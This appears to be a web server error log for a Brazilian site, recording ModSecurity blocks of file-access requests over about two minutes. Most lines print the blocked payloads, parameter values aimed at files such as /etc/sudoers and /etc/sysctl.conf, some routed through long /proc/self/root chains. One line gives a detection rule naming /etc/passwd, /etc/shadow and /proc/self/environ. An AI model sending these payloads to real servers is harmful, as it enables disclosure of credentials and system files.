[Fri Mar 20 11:06:13.740046 2026] [:error] [pid 7893:tid 140411725141760] [client 74.7.241.31:34210] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1UVBCii7xarUs8iHaSUQAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:06:17.079872 2026] [:error] [pid 10189:tid 140411582465792] [client 57.141.18.13:56052] [client 57.141.18.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1UWTJ3M9BSuKP7CAZNowAAAJM"]
[Fri Mar 20 11:06:20.341798 2026] [mime_magic:error] [pid 9818:tid 140411590858496] (70014)End of file found: [client 57.141.18.62:56204] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:06:30.932911 2026] [:error] [pid 7893:tid 140411599251200] [client 57.141.18.83:56668] [client 57.141.18.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc0.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1UZhCii7xarUs8iHaSZAAAAhE"]
[Fri Mar 20 11:06:35.475290 2026] [:error] [pid 15826:tid 140411557287680] [client 216.73.216.191:56834] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/os-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1UauoXxyEfFpUF8f-oCQAAAVY"]
[Fri Mar 20 11:06:35.475509 2026] [:error] [pid 26799:tid 140411565680384] [client 216.73.216.191:56830] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1Uata6ubjKNq_cu4YCYgAAA1U"]
[Fri Mar 20 11:06:35.477184 2026] [:error] [pid 11167:tid 140411641214720] [client 74.7.241.31:34212] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1UavHIg5MgXLBnicMd6QAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:06:44.277565 2026] [:error] [pid 21219:tid 140411658000128] [client 216.73.216.191:57272] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudoers"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1UdPXLqtnMIWvjpaLDjgAAAoo"]
[Fri Mar 20 11:06:53.235137 2026] [:error] [pid 9818:tid 140411741927168] [client 216.73.216.191:57760] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1UfV1pVZ5mVmJwsFNXNgAAAEA"]
[Fri Mar 20 11:06:54.978611 2026] [:error] [pid 9818:tid 140411691570944] [client 216.73.216.191:57840] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1UfV1pVZ5mVmJwsFNXOQAAAEY"]
[Fri Mar 20 11:07:00.899413 2026] [:error] [pid 31215:tid 140411708356352] [client 57.141.18.23:58068] [client 57.141.18.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1UhAF0L0L-SsrnPo6RZQAAAsQ"]
[Fri Mar 20 11:07:06.544815 2026] [:error] [pid 7235:tid 140411599251200] [client 216.73.216.191:58472] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo-ldap.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1UivqxLDW4GITHUkQRpwAAARE"]
[Fri Mar 20 11:07:17.333778 2026] [mime_magic:error] [pid 10189:tid 140411699963648] (70014)End of file found: [client 57.141.18.48:59112] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:07:21.675638 2026] [:error] [pid 11167:tid 140411624429312] [client 216.73.216.191:59312] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc5.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1UmfHIg5MgXLBnicMeEgAAAc4"]
[Fri Mar 20 11:07:21.915688 2026] [mime_magic:error] [pid 11167:tid 140411666392832] (70014)End of file found: [client 216.73.216.191:59260] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:07:21.915704 2026] [mime_magic:error] [pid 7893:tid 140411616036608] (70014)End of file found: [client 74.7.241.31:44304] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/lib/firmware
[Fri Mar 20 11:07:21.992069 2026] [:error] [pid 26799:tid 140411632822016] [client 216.73.216.191:59326] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1Umda6ubjKNq_cu4YCmQAAA00"]
[Fri Mar 20 11:07:23.263804 2026] [:error] [pid 21219:tid 140411590858496] [client 216.73.216.191:59396] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1Um_XLqtnMIWvjpaLDygAAApI"]
[Fri Mar 20 11:07:25.819555 2026] [:error] [pid 15826:tid 140411632822016] [client 216.73.216.191:59590] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1UneoXxyEfFpUF8f-oWAAAAU0"]
[Fri Mar 20 11:07:37.425481 2026] [:error] [pid 10189:tid 140411725141760] [client 57.141.18.113:60356] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grep_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1UqDJ3M9BSuKP7CAZOAAAAAII"]
[Fri Mar 20 11:07:48.611527 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.241.31:33800] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1UtNa6ubjKNq_cu4YCxAAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:07:50.065456 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.241.31:53692] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Utta6ubjKNq_cu4YCxwAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:07:51.791066 2026] [:error] [pid 26799:tid 140411733534464] [client 57.141.18.6:33242] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Ut9a6ubjKNq_cu4YCyQAAA0E"]
[Fri Mar 20 11:07:52.030986 2026] [:error] [pid 11642:tid 140411557287680] [client 57.141.18.86:33260] [client 57.141.18.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/e2fsck.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1UuLninkcc-iUj5AqFmwAAA5Y"]
[Fri Mar 20 11:07:54.921839 2026] [:error] [pid 7235:tid 140411565680384] [client 216.73.216.191:33466] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1UuvqxLDW4GITHUkQR8QAAARU"]
[Fri Mar 20 11:07:54.971465 2026] [:error] [pid 11642:tid 140411649607424] [client 57.141.18.1:33470] [client 57.141.18.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Uurninkcc-iUj5AqFnwAAA4s"]
[Fri Mar 20 11:08:05.244137 2026] [:error] [pid 7893:tid 140411599251200] [client 216.73.216.191:33824] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1UwxCii7xarUs8iHaS8wAAAhE"]
[Fri Mar 20 11:08:06.935329 2026] [:error] [pid 11167:tid 140411616036608] [client 74.7.241.31:53706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1UxvHIg5MgXLBnicMeQgAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:08:08.840305 2026] [mime_magic:error] [pid 26799:tid 140411658000128] (70014)End of file found: [client 216.73.216.191:34140] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:08:08.844109 2026] [:error] [pid 9818:tid 140411590858496] [client 57.141.18.28:34142] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/adjtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1UyF1pVZ5mVmJwsFNXiwAAAFI"]
[Fri Mar 20 11:08:09.128952 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.241.31:33892] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1UyfqxLDW4GITHUkQR_wAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
